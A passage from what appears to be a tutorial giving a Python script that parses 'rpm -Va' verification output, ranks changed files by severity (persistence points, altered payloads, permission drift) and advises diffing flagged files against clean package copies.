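# flags (or "missing"), optional attribute column (c=config, d=doc, g=ghost,
# l=license, r=readme), then the path
LINE = re.compile(r"^(missing|[SM5DLUGTP.?]{9})\s+(?:([cdglr]+)\s+)?(\S.*)$")


def parse_rpm_va(text):
    """One dict per line: path, missing flag, config flag, set of changed attributes."""
    records = []
    for raw in text.splitlines():
        m = LINE.match(raw.rstrip())
        if not m:
            continue
        flags, attrs, path = m.groups()
        changed = set() if flags == "missing" else {FLAG_NAMES[c] for c in flags if c in FLAG_NAMES}
        records.append({"path": path, "missing": flags == "missing",
                        "config": bool(attrs and "c" in attrs), "changed": changed})
    return records


def severity(rec):
    """high: persistence point, or package payload whose content changed;
    medium: file gone, or mode/ownership drift (think: a new setuid bit);
    low: an edited config file, usually the admin's own work."""
    p = rec["path"]
    if p in PERSISTENCE_PATHS or p.startswith(PERSISTENCE_PREFIXES):
        return "high"
    if rec["missing"]:
        return "medium"
    if "digest" in rec["changed"] and not rec["config"]:
        return "high"
    if rec["changed"] & {"mode", "user", "group"}:
        return "medium"
    return "low"


def rank(text):
    """Parsed records sorted high -> low, then by path."""
    recs = parse_rpm_va(text)
    order = {"high": 0, "medium": 1, "low": 2}
    for r in recs:
        r["severity"] = severity(r)
    return sorted(recs, key=lambda r: (order[r["severity"]], r["path"]))


if __name__ == "__main__":
    for r in rank(SAMPLE_RPM_VA):
        what = "missing" if r["missing"] else ",".join(sorted(r["changed"]))
        kind = "config" if r["config"] else "payload"
        print("%-6s %-8s %s  %s" % (r["severity"], kind, r["path"], what))
```

Pipe the real output in with rpm -Va > verify.txt and read that file in place of SAMPLE_RPM_VA; then follow up the high entries with diff against the pristine copy from the package (rpm2cpio on a clean RPM) rather than trusting the mtime.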
